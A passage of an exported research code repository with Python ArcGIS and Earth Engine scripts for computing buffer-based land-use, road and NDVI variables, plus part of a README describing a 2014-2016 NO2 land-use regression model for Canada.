\n# test all zipped files in an input folder for correctness and remove corrupted files\n# INPUTS:\n#    inputFolder (str) - folder containing zip files to test (and clean)\ndef cleanZip(inputFolder):\n    candidateZips = os.listdir(inputFolder)\n    for candidate in candidateZips:\n        if(candidate[len(candidate)-3:len(candidate)] == \"zip\"):\n            try:\n                a = zipfile.ZipFile(inputFolder + \"/\" + candidate)\n                # an archive with an empty file list is corrupt: remove it so it will be re-downloaded\n                if(len(a.namelist()) == 0):\n                    del(a)\n                    os.remove(inputFolder + \"/\" + candidate)    \n            except:\n                print(\"removing file \" + candidate)\n                os.remove(inputFolder + \"/\" + candidate)\n\n\n# perform focal statistics on a single raster\n# INPUTS:\n#    inputRaster (str) - full filepath to the raster\n#    numCells (int) - radius of the focal statistics, in number of cells\n#    outputFile (str) - full filepath where the output focal statistics raster will be written\ndef focalStatsOnOneRaster(inputRaster,numCells,outputFile):\n    outRaster = arcpy.sa.FocalStatistics(inputRaster, arcpy.sa.NbrCircle(numCells, \"CELL\"), \"MEAN\", \"DATA\")\n    outRaster.save(outputFile)\n\n# perform focal statistics on all rasters located within a given input folder\n# INPUTS:\n#    inputFolder (str) - folder where rasters to perform focal stats on are stored\n#    numCells (int) - radius of the focal statistics, in number of cells\n#    outputFolder (str) - full filepath where the output focal statistics rasters will be written\ndef focalStatisticsAllRasters(inputFolder,numCells,outputFolder):\n    candidateFiles = os.listdir(inputFolder)\n    filesToProcess = []\n    for candidateFile in candidateFiles:\n        if(candidateFile[len(candidateFile)-3:len(candidateFile)] == \"tif\"):\n            outputFile = outputFolder + \"/\" + candidateFile[0:len(candidateFile)-8] + \".tif\"\n            if not (os.path.exists(outputFile)):\n                print(outputFile)\n                focalStatsOnOneRaster(inputFolder + \"/\" + candidateFile, numCells,outputFile)\n            else:\n                print(outputFile + ' already exists')\n\n\n# merge multiple rasters into a single mosaiced raster\n# INPUTS:\n#    inputFolder (str) - folder containing all rasters to merge\n#    year (int) - year all rasters represent - used in mosaic filename\ndef mergeRasters(inputFolder,year):\n    candidateFiles = os.listdir(inputFolder)\n    filesToMerge = []\n    for candidateFile in candidateFiles:\n        if(candidateFile[len(candidateFile)-3:len(candidateFile)] == \"tif\"):\n            filesToMerge.append(inputFolder + \"/\" + candidateFile)\n    print(filesToMerge)\n    \n    arcpy.MosaicToNewRaster_management( \n        input_rasters=filesToMerge, output_location=parentFolder, \n        raster_dataset_name_with_extension=\"uNDVIx\" + str(year) + \".tif\", \n        coordinate_system_for_the_raster=\"\", \n        pixel_type=\"32_BIT_FLOAT\", cellsize=\"\", \n        number_of_bands=\"1\", \n        mosaic_method=\"MAXIMUM\", \n        mosaic_colormap_mode=\"FIRST\"\n    )\n\n\n#################### main function #############\n\n# download all NDVI rasters for all years and all locations\n# INPUTS:\n#    rawData (dataframe) - pandas dataframe containing data read from csv\n#    reducerType (str) - type of ee.Reducer to create: mean or max\n#    unscreenedRasterFolder (str) - folder where downloaded rasters will be stored\n#    startYear (int) - starting year of data coverage\n#    endYear (int) - ending year of data coverage\ndef downloadNDVI_All_Years(rawData, reducerType,unscreenedRasterFolder,startYear,endYear):\n    for i in range(startYear,endYear+1):\n        if(os.path.exists(unscreenedRasterFolder + str(i))):\n            cleanZip(unscreenedRasterFolder + str(i))\n    if(reducerType==\"MEAN\"):\n        reducer = ee.Reducer.mean()\n    else:\n        reducer = ee.Reducer.max()\n    # note: iteration starts at row 1 and uses the non-null count of the second column as the row count\n    for index in range(1,rawData.count()[1]):    \n        downloadSinglePoint(getRowData(rawData,index,startYear,endYear),reducer,unscreenedRasterFolder)\n
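\n# expected on-disk layout after a successful run (illustrative id; the paths follow the\n# zipFile construction in downloadSinglePoint above):\n#   unscreenedMax/2014/17.zip, unscreenedMax/2015/17.zip, ... - one zip per location id\n#   per year, each extracted in place to the .tif file(s) bundled in the archive\n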
\n\ndef main():\n    rawData = pd.read_csv(inputCSVFile)\n    #screenedRasterFolder = parentFolder + \"screenedMean/\"\n    #unscreenedRasterFolder = parentFolder + \"unscreenedMean/\"    \n    #downloadMODIS_All_Years(rawData,\"MEAN\",unscreenedRasterFolder,START_YEAR,END_YEAR)\n    screenedRasterFolder = parentFolder + \"screenedMax/\"\n    unscreenedRasterFolder = parentFolder + \"unscreenedMax/\"    \n    downloadNDVI_All_Years(rawData,\"MAX\",unscreenedRasterFolder,START_YEAR,END_YEAR)    \n\n#main()\n\n\n#for i in range(START_YEAR,END_YEAR+1):\n#    outputFile = parentFolder + \"/uNDVIx\" + str(i) + \".tif\"\n#    if not os.path.exists(outputFile):\n#        mergeRasters(parentFolder + \"unscreenedMax/\" + str(i),i)\n\n# the download and merge steps above are commented out; screening null values is the step\n# currently active when this script is run\nscreenedRasterFolder = parentFolder + \"screenedMax/\"\nunscreenedRasterFolder = parentFolder + \"unscreenedMax/\"    \ncreateRasters(unscreenedRasterFolder,screenedRasterFolder)\n\n\n#focalStatisticsAllRasters(parentFolder + \"/screenedMax\", 1, parentFolder + \"MaxNDVIFocal/x250\")\n#focalStatisticsAllRasters(parentFolder + \"/screenedMax\", 2, parentFolder + \"MaxNDVIFocal/x500\")\n#focalStatisticsAllRasters(parentFolder + \"/screenedMax\", 4, parentFolder + \"MaxNDVIFocal/x1000\")\n\n\n############### end of downloadGreenspace.py ################" }, { "alpha_fraction": 0.6684962511062622, "alphanum_fraction": 0.6732752919197083, "avg_line_length": 49.80529022216797, "blob_id": "5f55cf893aaca3014b5f92e1b83f5df17ebfa9aa", "content_id": "dfdd6a3a1d0de5bbbce1833278487a772953092f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21134, "license_type": "permissive", "max_line_length": 208, "num_lines": 416, "path": "/Processing Scripts/bufferFunctions_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "################# BufferVariables.py ##################\n#\n# Contains functions for automating several ArcGIS functions during the development of a Land Use Regression model.\n# Functions include generating a series of buffers around points in a shapefile, determining polyline length within each unique buffer,\n# and determining average raster values within the buffer.\n#\n# Author: Andrew Larkin\n# Created for: Perry Hystad, Oregon State University\n# Last modified: 12/08/2014\n#\n# Requirements:\n#    ArcGIS with spatial extension (tested on ArcGIS v. 10.2)\n#    ArcGIS compatible version of python (tested with Python v. 2.7)\n#    Python integrated development environment is highly recommended but not required\n#    StatisticsForOverlappingZones.py script (provided by NOAA) is required for the batchRasterBufferIntersect function\n#    constantvalues.py contains all modifiable input values (e.g. 
input files, folder locations)\n\n\n############## import required modules ###############\nimport arcpy\nfrom arcpy import sa\narcpy.CheckOutExtension(\"spatial\")\narcpy.env.overwriteOutput = True\nfrom arcpy import env\nimport StatisticsForOverlappingZones as overlap\nimport constantValues as values\nimport gc\nimport os\nimport math\nimport time\nimport sys\nimport shutil\nimport constantValues\n############## end of module import ##################\n\n\n\n################# functions ##################################\n\n# determine the unique number assigned to the partition dataset in process\ndef determineAirMonitorIdentifier(airMonitorPartitionFile):\n startLocation = airMonitorPartitionFile.rfind(values.KEYWORD) + len(values.KEYWORD) \n endLocation = airMonitorPartitionFile.find(\".shp\")\n identifier = airMonitorPartitionFile[startLocation:endLocation]\n print(\"this air monitor's identity is \" + str(identifier))\n return identifier\n### end of determineAirMonitorIdentifier\n\n\ndef assignZones():\n #relpath = os.path.dirname(os.path.realpath(__file__))\n zoneDefined = values.RESULTS_FOLDER + \"w_zones.shp\"\n print(\"defined zoneDefined\")\n arcpy.SpatialJoin_analysis(values.INPUT_FOLDER + values.MONITOR_FILE,values.INPUT_FOLDER + values.ZONE_DEFINITIONS,zoneDefined,\"JOIN_ONE_TO_ONE\",\"KEEP_ALL\",\"#\",\"CLOSEST\",\"#\",\"#\")\n print(\"completed zone assignments\")\n return zoneDefined\n\n\n# calculate point values for air monitoring stations\ndef runPointAnalysis(airMonitorFile, pointList):\n #calculate distance from coast to air monitor location\n #arcpy.Near_analysis(values.INPUT_FOLDER + values.MONITOR_FILE, values.INPUT_FOLDER + \n # values.COAST_BOUNDARY,search_radius=\"#\",location=\"NO_LOCATION\",angle=\"NO_ANGLE\",method=\"PLANAR\") \n rasterArgumentsList = \"\"\n # for each raster file used as point value data source, add it to the extract multivalues list and run extractMutliValues with arcpy\n if(len(pointList) >0):\n for pointFile in pointList:\n rasterArgument = values.INPUT_FOLDER + pointFile\n outputFile = values.RESULTS_FOLDER + \"pointAnalysisTemp.shp\"\n arcpy.sa.ExtractValuesToPoints(airMonitorFile, rasterArgument,values.RESULTS_FOLDER + \"pointAnalysisTemp.shp\", \"NONE\")\n arcpy.AddField_management(outputFile, pointFile[0:2], \"DOUBLE\", \"\", \"\")\n expression2 = \"!\" + \"RASTERVALU\" + \"! 
* 1\"\n arcpy.CalculateField_management(outputFile, pointFile[0:2], expression2, \"PYTHON\")\n arcpy.DeleteField_management(outputFile, \"RASTERVALU\")\n arcpy.CopyFeatures_management(outputFile, airMonitorFile) \n else:\n print(\"there are no point variables to process\")\n print(\"completed calculating point values for the air monitor data set\")\n### end runPointAnalysis ###\n\ndef testProgress(result):\n print(\"we're testing progress\")\n timeDif = 0\n while(timeDif <values.RATER_PROCESS_WAIT_TIME):\n try:\n result.get(timeout=values.RATER_PROCESS_WAIT_TIME)\n if(result.successful()==True):\n break \n except Exception as e:\n print(\"timeout\" + str(e))\n #print(os.path.getmtime(\"E:/pyResults2/tempStats/teworkfile.txt\"))\n timeDif = time.time() - os.path.getmtime(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE + \"/\" + values.TEST_PROGRESS_FILE)\n print(timeDif)\n print(\"multiprocessing has either completed or stopped progress\")\n\n\ndef determineAirMonitorZone(airMonitorPartitionFile):\n startLocation = airMonitorPartitionFile.rfind(values.ZONE_KEYWORD)\n endLocation = airMonitorPartitionFile.rfind(values.PARTITION_KEYWORD)\n zoneIdentifier = airMonitorPartitionFile[startLocation+1:endLocation]\n return zoneIdentifier\n### end of determineAirMonitorZone\n\n\ndef determineMosaicFile(mosaicFolder, zoneIdentifier, fileType):\n selectFile=[]\n fileList = os.listdir(values.INPUT_FOLDER + mosaicFolder)\n if fileType == values.RASTER_TYPE or fileType == values.POINT_TYPE:\n extension = \".tif\"\n elif(fileType == values.POLYLINE_TYPE):\n extension = \".shp\"\n fileList = os.listdir(values.INPUT_FOLDER + mosaicFolder)\n for file in fileList:\n startLocation = file.rfind(\"z\")\n endLocation = file.rfind(extension)\n zoneValue = file[startLocation+1:endLocation]\n if zoneValue == zoneIdentifier:\n #print(\"the file for the zone value is: \" + file[0:endLocation] + extension)\n selectFile = mosaicFolder + \"/\" + file[0:endLocation] + extension \n return selectFile\n\n# partition a shapefile with a large number of air monitoring stations into several shapefiles with a smaller\n# number of monitoring stations per file\ndef partitionShapefile(airMonitorFile):\n newPath = values.RESULTS_FOLDER\n shapeFileList = []\n with arcpy.da.SearchCursor(airMonitorFile,\"zone\") as cursor: \n for zone in sorted({row[0] for row in cursor}):\n whereClause = '\"zone\" = ' + str(zone) \n print(zone)\n tempFile = newPath + \"spat_join_temp.shp\"\n lyr = arcpy.MakeFeatureLayer_management(airMonitorFile)\n arcpy.Select_analysis(lyr, tempFile, whereClause)\n getCount = int(arcpy.GetCount_management(tempFile).getOutput(0))\n numPartitions = int(math.ceil(float(getCount)/values.PARTITION_SIZE))\n print(\"the number of partitions for zone \" + str(zone) + \"is \" + str(numPartitions))\n for i in range(0,numPartitions):\n newPath = values.RESULTS_FOLDER + \"/\" + values.KEYWORD + \"z\" + str(zone) + \"i\" + str(i)\n if not os.path.exists(newPath): os.makedirs(newPath) \n outputFileName =newPath + \"/\" + values.KEYWORD + \"z\" + str(zone) + \"i\" + str(i) + \".shp\"\n whereClause = '\"FID\" >= ' + str(i*values.PARTITION_SIZE) + ' AND \"FID\" < ' + str(min(getCount+1, (i+1)*values.PARTITION_SIZE))\n print(whereClause)\n arcpy.Select_analysis(tempFile, outputFileName, whereClause)\n print(\"created partition zone \" + str(zone) + \", id \" + str(i))\n shapeFileList.append(outputFileName)\n print(\"completed zone \" + str(zone))\n print(\"finished paritionShapeFile\")\n print(shapeFileList) \n 
return(shapeFileList)\n \n\n\n\n\n\n\n\n# add varaible values to the partition air monitor shapefile\ndef addVariableToPartition(argument, airMonitor,valueType):\n bufferIndex = str(argument[0]).rfind(\"buffer\") + 6\n variableIdent = argument[0][bufferIndex:-4]\n if(valueType == values.RASTER_TYPE):\n valueFile = argument[2] + variableIdent + \".shp\"\n arcpy.JoinField_management(airMonitor,\"FID\",valueFile,values.AIRMONITOR_ID,variableIdent)\n elif(valueType == values.POLYLINE_TYPE):\n valueFile = argument[2] + variableIdent + \"d.shp\"\n arcpy.JoinField_management(airMonitor,\"FID\",valueFile,values.BUFFER_ID,variableIdent)\n elif(valueType == values.POINT_BUFFER_TYPE):\n valueFile = argument[2] + variableIdent + \"d.shp\"\n arcpy.JoinField_management(airMonitor,\"FID\",valueFile,values.BUFFER_ID,variableIdent) \n print (\"completed adding the \" + variableIdent + \" to the air monitor partition \" + airMonitor)\n### end of addVariableToPartition\n\n\n# make a buffer of given input distance from the points in the given input file. \n# write the results into the designated outputFolder\ndef makeBuffer(bufferDistance, inputFile, dataFolderOut): \n # for each bufferDistance to be created, run through the ArcGIS buffer analysis tool and create an output .shp file \n inputFilePath = inputFile\n outputFile = \"buffer\" + str(bufferDistance) + \"m.shp\"\n outputFilePath = dataFolderOut + outputFile\n buffDistance = str(bufferDistance) + \" Meters\"\n if(os.path.exists(outputFilePath)):\n print(\"warning: \" + outputFilePath + \"already exists. File will be overwritten\")\n arcpy.Buffer_analysis(in_features=inputFilePath,out_feature_class=outputFilePath,buffer_distance_or_field=buffDistance,\n line_side=\"FULL\",line_end_type=\"ROUND\",dissolve_option=\"NONE\",dissolve_field=\"#\")\n #print (\"completed making the \" + str(bufferDistance) + \"m buffer\")\n return outputFilePath # return the list of generated output files\n### end of makeBuffer ### \n\n\n# create buffer shapefiles and a folder to store them in\ndef makeMultipleBuffers(partitionFile):\n startLocation = partitionFile.rfind(values.KEYWORD) + len(values.KEYWORD)\n endLocation = partitionFile.find(\".shp\")\n identifier = partitionFile[startLocation:endLocation] \n partitionFolderOut = values.RESULTS_FOLDER + values.KEYWORD + identifier\n bufferFolder = partitionFolderOut + values.BUFFER_EXTENSION\n if not os.path.exists(bufferFolder): os.makedirs(bufferFolder)\n for buffer in values.BUFFER_DISTANCE:\n makeBuffer(buffer,partitionFile, bufferFolder)\n### end of makeBuffers\n\n# create a copy of the buffer file for each parallel processing thread\ndef createBufferFileCopy(masterBufferFile, variable, identifier, buffer, partitionFolderOut):\n tempFileName = \"buffer\" + variable[0] + variable[1] + buffer + \"m.shp\"\n tempBufferFile = partitionFolderOut + values.BUFFER_EXTENSION + tempFileName\n arcpy.CopyFeatures_management(masterBufferFile, tempBufferFile)\n return tempBufferFile\n### end of createBufferFileCopy\n\n\n# create a list of arguments to pass into the wrapper function for parallel processing of a variable\ndef createArgumentList(variableList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor):\n argumentList = []\n for variable in variableList: # for each variable that we want to proces (i.e. 
included in the list)\n variableIdent = variable[0] + variable[1]\n variableOutputFolder = partitionFolderOut + variable[0] + variable[1] + \"/\" \n tempBufferFile = createBufferFileCopy(masterBufferFile, variable, identifier, str(buffer), partitionFolderOut)\n # add the created list of arguments to the master list of arguments to be used in the call for parallel processing\n argumentList.append([tempBufferFile, values.INPUT_FOLDER + variable, variableOutputFolder, airMonitor, str(buffer)]) \n print(\"completed making arguments for parallel processing of buffer varaible analysis\")\n return argumentList\n### end of createArguemntList\n\n\n# calculate average values of a polyline file within given buffer areas\ndef polylineBufferIntersect(bufferFile, variableFile, variableOutputFolder, airMonitorFile, bufferSize):\n bufferIndex = str(bufferFile).rfind(\"buffer\") + 6\n variableIndex = str(variableFile).rfind(\"/\") + 1\n variableIdent = bufferFile[bufferIndex:-4]\n fileList = []\n if(os.path.exists(variableOutputFolder)):\n fileList = os.listdir(variableOutputFolder)\n for fileName in fileList:\n if(variableIdent in fileName):\n os.remove(variableOutputFolder + fileName)\n print(\"removed file: \" + variableOutputFolder + fileName)\n intersectFile = variableOutputFolder + variableIdent + \".shp\"\n if(os.path.isfile(intersectFile)):\n os.remove(intersectFile)\n dissolveFile = variableOutputFolder + variableIdent + \"d.shp\"\n if not os.path.exists(variableOutputFolder): os.makedirs(variableOutputFolder) \n tableFile = variableOutputFolder + variableIdent + \".shp\"\n if(os.path.isfile(tableFile)):\n os.remove(tableFile)\n fieldName = variableIdent # new field to add to feature class table \n \n # intersect the buffer\n arcpy.Intersect_analysis(bufferFile +\";\" + variableFile, intersectFile, \"ALL\", \"\", \"INPUT\")\n \n # combine line segments within each buffer zone (overlapping areas are accounted for)\n arcpy.Dissolve_management(intersectFile,dissolveFile,values.BUFFER_ID,\"#\",\"MULTI_PART\",\"DISSOLVE_LINES\") \n \n # create a new field in the dissolved feature class\n arcpy.AddField_management(dissolveFile, fieldName, \"DOUBLE\", \"\", \"\")\n \n # calculate the total length of polyline segments in each unique buffer and store the result in the new field\n arcpy.CalculateField_management(dissolveFile, fieldName, values.LENGTH_COMMAND, \"PYTHON\")\n #avgLengthCommand = \"!shape.length@kilometers! 
/ math.pi / \" + str(float(bufferSize)/1000) + \"**2\"\n #fieldNameNormalized = variableIdent + \"n\"\n #arcpy.AddField_management(dissolveFile, fieldNameNormalized, \"DOUBLE\", \"\", \"\")\n #arcpy.CalculateField_management(dissolveFile, fieldNameNormalized, avgLengthCommand, \"PYTHON\")\n \n \n \n del (bufferFile, variableFile, airMonitorFile, bufferSize, bufferIndex, variableIndex, \n variableIdent, variableOutputFolder, intersectFile, dissolveFile, tableFile, fieldName)\n gc.collect() \n\n\ndef pointBufferIntersect(bufferFile, variableFile, variableOutputFolder, airMonitorFile, bufferSize):\n bufferIndex = str(bufferFile).rfind(\"buffer\") + 6\n variableIndex = str(variableFile).rfind(\"/\") + 1\n variableIdent = bufferFile[bufferIndex:-4]\n intersectFile = variableOutputFolder + variableIdent + \".shp\"\n dissolveFile = variableOutputFolder + variableIdent + \"d.shp\" \n if not os.path.exists(variableOutputFolder): os.makedirs(variableOutputFolder) \n tableFile = variableOutputFolder + variableIdent + \".shp\"\n if(os.path.isfile(tableFile)):\n return \n fieldName = variableIdent # new field to add to feature class table \n \n # intersect the buffer\n arcpy.Intersect_analysis(bufferFile +\";\" + variableFile, intersectFile, \"ALL\", \"\", \"INPUT\")\n \n # combine line segments within each buffer zone (overlapping areas are accounted for)\n # Replace a layer/table view name with a path to a dataset (which can be a layer file) or create the layer/table view within the script\n # The following inputs are layers or table views: \"powerPlants_Intersect\"\n arcpy.Dissolve_management(intersectFile,dissolveFile,values.BUFFER_ID,\"carbon_200 SUM\",\"MULTI_PART\",\"DISSOLVE_LINES\") \n \n # create a new field in the dissolved feature class\n arcpy.AddField_management(dissolveFile, fieldName, \"DOUBLE\", \"\", \"\")\n \n # calculate the total length of polyline segments in each unique buffer and store the result in the new field\n arcpy.CalculateField_management(dissolveFile, fieldName, values.CARBON_COMMAND, \"PYTHON\") \n \n del (bufferFile, variableFile, airMonitorFile, bufferIndex, variableIndex, \n variableIdent, variableOutputFolder, intersectFile, dissolveFile, tableFile, fieldName)\n gc.collect() \n\ndef testFileCompletion(argumentList):\n fileCompletion = True\n for argument in argumentList:\n bufferIndex = str(argument[0]).rfind(\"buffer\") + 6\n variableIdent = argument[0][bufferIndex:-4]\n valueFile = argument[2] + variableIdent + \".shp\"\n testTemp = 0\n if(os.path.isfile(valueFile)):\n for field in arcpy.ListFields(valueFile):\n if(field.name == argument[2] + variableIdent):\n testTemp = 1\n else:\n testTemp = max(testTemp,0)\n fileCompletion = fileCompletion * os.path.isfile(valueFile)\n return(fileCompletion)\n\n# parallel processing natively only accepts a single argument for input. \n# this is a wrapper function to accept a single list of inputs from the parall\ndef multi_run_raster_wrapper(args):\n return rasterBufferIntersect(*args)\n### end of multi_run_wrapper\n\n\n# parallel processing natively only accepts a single argument for input. 
\n# this is a wrapper function to accept a single list of inputs from the parall\ndef multi_run_polyline_wrapper(args):\n return polylineBufferIntersect(*args)\n### end of multi_run_wrapper\n\n# calculate average values of a raster within various buffer zones in a shapefile\ndef rasterBufferIntersect(bufferFile, variableFile, variableOutputFolder, airMonitorFile, bufferSize):\n continueVar = 1\n var1 = variableFile\n bufferIndex = str(bufferFile).rfind(\"buffer\") + 6\n variableIndex = str(variableFile).rfind(\"/\") + 1\n variableIdent = bufferFile[bufferIndex:-4]\n partitionIdentStart = variableOutputFolder.rfind(\"Partition\") + len(\"Partition\")\n partitionIdentEnd = variableOutputFolder.rfind(\"/\")\n partitionId = variableOutputFolder[partitionIdentStart:partitionIdentEnd]\n if not os.path.exists(variableOutputFolder): os.makedirs(variableOutputFolder)\n tableFile = variableOutputFolder + variableIdent + \".shp\" \n tempTestValue = 1\n while(continueVar==1):\n if(os.path.isfile(tableFile)):\n print(str(tableFile) + \" already exists\")\n sys.stdout.flush()\n for field in arcpy.ListFields(tableFile):\n #print(\"the field name is \" + str(field.name))\n #sys.stdout.flush()\n #print(variableIdent)\n sys.stdout.flush()\n if field.name == variableIdent:\n continueVar = 0\n tempTestValue = 0\n print(\"the field already exists, no need to rerun for variable \" + str(variableIdent))\n sys.stdout.flush()\n return\n if(tempTestValue == 1):\n try:\n os.remove(variableOutputFolder + variableIdent + \".shp\")\n os.remove(variableOutputFolder + variableIdent + \".cpg\")\n os.remove(variableOutputFolder + variableIdent + \".shx\")\n os.remove(variableOutputFolder + variableIdent + \".dbf\")\n os.remove(variableOutputFolder + variableIdent + \".prj\")\n #deleteTest = arcpy.Delete_management(tableFile)\n print(\"deleted corrupt shapefile \" + tableFile )\n except Exception as e:\n print(\"cannot delete shapefile \" + str(tableFile) + str(e))\n sys.stdout.flush()\n if(continueVar==1):\n try: \n raster = arcpy.Raster(var1)\n arcpy.env.cellSize = raster.meanCellHeight/10.0\n expression2 = []\n try:\n continueVar = overlap.runFeatureRasterIntersect(bufferFile, values.TABLE_ID, variableFile, tableFile, variableFile[variableIndex:variableIndex+2],partitionId,str(bufferSize)) \n except:\n print(\"could not run overlap.runfeatureIntersect\")\n try:\n for field in arcpy.ListFields(tableFile, \"*_MEAN\"):\n meanField = field.name\n expression2 = \"!\" + meanField + \"! 
* 1\"\n                        #print(\"we finished statistics overlap, mean expression is \" + str(expression2))\n                        #sys.stdout.flush()\n                except:\n                    expression2 = \"-9999\"\n                    print(\"-9999 was used\")\n                    #sys.stdout.flush()\n                arcpy.AddField_management(tableFile, variableIdent, \"DOUBLE\", \"\", \"\")    \n                arcpy.CalculateField_management(tableFile, variableIdent, expression2, \"PYTHON\")    \n                #sys.stdout.flush()\n                print(variableIdent + \" raster for buffer size \" + str(bufferSize) + \" completed\")\n                del (bufferFile, variableFile, tableFile, raster, airMonitorFile, bufferSize)\n                gc.collect()\n                print(\"finished raster analysis\")\n                try:\n                    tempWorkspace = constantValues.RESULTS_FOLDER + constantValues.TEMP_STATS_WORKSPACE + \"/\" + variableFile[variableIndex:variableIndex+2] + str(partitionId) + str(bufferSize) + \"/zonalStats\"\n                    shutil.rmtree(tempWorkspace)\n                except:\n                    print(\"could not remove the temp workspace\")    \n            except Exception as e:\n                print(\"raster analysis failed \" + str(e) + \" \" + variableIdent)\n                continueVar = 1\n                continue\n            try:\n                sys.stdout.flush()\n            except:\n                print(\"flush didn't work\")\n            continueVar = 0\n### end of rasterBufferIntersect ###    \n    \n################# end of functions ############################\n\n\n############### end of BufferVariables.py ###############" }, { "alpha_fraction": 0.7154144644737244, "alphanum_fraction": 0.7510415315628052, "avg_line_length": 90.59210205078125, "blob_id": "5fdf8b228a8b37e3b2d827e7e642719b0ac6d9f5", "content_id": "516a8f298a2508778b0fe9213781c4881b288f4a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6961, "license_type": "permissive", "max_line_length": 272, "num_lines": 76, "path": "/Readme.md", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "![GitHub Logo](./Canada_Map.png)\n\n**Author:** [Andrew Larkin](https://www.linkedin.com/in/andrew-larkin-525ba3b5/) <br>\n**Affiliation:** [Oregon State University, College of Public Health and Human Sciences](https://health.oregonstate.edu/) <br>\n**Principal Investigator:** [Perry Hystad](https://health.oregonstate.edu/people/perry-hystad) <br>\n**Date Created:** September 14th, 2018\n\n\n\n### Summary ###\nThis notebook contains the codebook, datasources, and names of the R and python scripts used to develop the 2014-2016 three year average LUR NO2 model for Canada. The sections of the notebook are as follows: <br> <br>\n**1 Codebook:** names and characteristics of variables used in the LUR model <br>\n**2 Datasources:** underlying sources of data used to derive the variables in the codebook <br>\n**3 Processing scripts:** names and descriptions of the scripts used to derive the variables in the codebook and develop the land use regression model <br>\n\n### Codebook ###\n\nVariables in the codebook are partitioned into distance-based, point-based, and buffer-based variables. All buffer distances are in meters.<br>\n\n#### Distance based variables ####  \n- **port_dist** - distance to nearest port. Units: meters. Datatype: Float. Datasource: 5.\n\n#### Point based variables ####\n\n- **elevation** - air monitor elevation level. Units: meters. Datatype: Int. Datasource: 7.\n- **mean_20YY** - annual mean NO2 concentration for year 20YY. Units: ppb. Datatype: Int. Datasource: 7.\n- **meanNO2_2014_2016** - average of annual mean NO2 concentrations from 2014 to 2016. Units: ppb. Datatype: Float. Datasource: 7.\n- **NAPS ID** - air monitor station id. Datatype: Int. 
Datasource: 7.\n- **numObs** - number of annual mean NO2 concentration measures between 2014 and 2016. Datatype: Int. Datasource: 7.\n- **percent completeness_20YY** - percent air monitor coverage for year YY. Datatype: Int. Datasource: 7.\n- **pr_YY** - annual mean daily precipitation for year YY. Units: mm. Datatype: Float. Datasource: 1.\n- **pr_14_16** - mean of pr_14, pr_15, and pr_16. Units: mm. Datatype: Float. Datasource: 1.\n- **te_YY** - annual mean daily max temperature for year YY. Units: degrees Celsius. Datatype: Float. Datasource: 1.\n- **te_14_16** - mean of te_14, te_15, and te_16. Units: degrees Celsius. Datatype: Float. Datasource: 1.\n- **sat_10_12** - three year (2010-2012) average of annual mean NO2 inferred from satellite observations. Units: ppb. Datatype: Float. Datasource: 2.\n\n#### Buffer based variables ####  \n\nBuffer distances range from 50m to 20km. Units are in meters and the datatype is float for buffer based variables unless indicated otherwise.\n- **alXXXXm** - sum area of industrial land use in buffer distance XXXX. Datasource: 5.\n- **blXXXXm** - sum area of open space or parks in buffer distance XXXX. Datasource: 5.\n- **bRXXXXm** - length of expressways in buffer distance XXXX. Datasource: 5.\n- **clXXXXm** - sum area of residential land use in buffer distance XXXX. Datasource: 5.\n- **cRXXXXm** - length of highways in buffer distance XXXX. Datasource: 5. \n- **dRXXXXm** - length of local roads in buffer distance XXXX. Datasource: 5.\n- **eRXXXXm** - length of major roads in buffer distance XXXX. Datasource: 5.\n- **fRXXXXm** - length of roads with truck restrictions in buffer distance XXXX. Datasource: 5.\n- **RaXXXXm** - length of railway and transit lines in buffer distance XXXX. Datasource: 5.\n- **waXXXXm** - percent area water in buffer distance XXXX. Datasource: 3.\n- **NDVI_14_16_XXXXm** - three year (2014-2016) average of mean value of max annual NDVI in buffer distance XXXX. Datasource: 4.\n- **NYXXXXm** - mean value of max annual NDVI in buffer distance XXXX for year 201Y. Datasource: 4.\n
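\nAs a quick reference for decoding the buffer variable names above, the sketch below splits a name into its two-character prefix and buffer distance. This helper was written for this README and is not part of the processing scripts (modelSelection_Canada_LUR.R performs the equivalent split in `getBuffDistVec`); it assumes the two-character prefixes listed above, so NDVI variables would need their longer prefix stripped first.\n\n```python\n# decompose a buffer variable name, e.g. \"cR1000m\" -> (\"cR\", 1000)\ndef split_buffer_name(name):\n    prefix, digits = name[:2], name[2:-1]  # drop the 2-char prefix and the trailing \"m\"\n    return prefix, int(digits)\n\nprint(split_buffer_name(\"cR1000m\"))  # ('cR', 1000): highway length within 1000m\n```\n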
\n### Datasources ###\n\n1. **Daymet V3: Daily Surface Weather and Climatological Summaries** Author: NASA. Spatial Resolution: 1000m. Temporal Resolution: Daily. Downloaded from Google Earth Engine (https://explorer.earthengine.google.com/#detail/NASA%2FORNL%2FDAYMET_V3) <br>\n2. **Geddes, J. A.; Martin, R. V.; Boys, B. L.; van Donkelaar, A. Long-term trends worldwide in ambient NO2 concentrations inferred from satellite observations. Environ. Health Perspect. Online 2016, 124 (3), 281** Spatial Resolution: 1km. Temporal Resolution: three year rolling average. <br> \n3. **GLCF: Landsat Global Inland Water.** Author: GLCF. Spatial Resolution: 30m. Temporal Resolution: Based on year 2000. Downloaded from Google Earth Engine (https://developers.google.com/earth-engine/datasets/catalog/GLCF_GLS_WATER)\n4. **Landsat 8 Collection 1 Tier 1 8-Day NDVI Composite.** Author: Google. Spatial Resolution: 30m. Temporal Resolution: 8-day. Downloaded from Google Earth Engine (https://developers.google.com/earth-engine/datasets/catalog/LANDSAT_LC08_C01_T1_8DAY_NDVI). \n5. **Canada Geospatial Data.** Author: DMTI. Spatial Resolution: NA. Temporal Resolution: Annual, 2015.\n6. **Population Density.** Author: Statistics Canada. Spatial Resolution: Census Block. Temporal Resolution: Based on year 2016.\n7. **National Air Pollutants Surveillance Program NO2 Measurements** Author: Department of the Environment, Canada. Spatial Resolution: NA. Temporal Resolution: Annual.\n8. **National Pollutant Release Inventory** Author: Department of the Environment, Canada. Spatial Resolution: NA. Temporal Resolution: Annual, based on year 2016. \n\n### Processing Scripts ###\n\nScripts 1 through 4 were used to derive exposure estimates. Scripts 5 and 6 were used to preprocess data, and script 7 was used to create the LUR model.\n\n1. 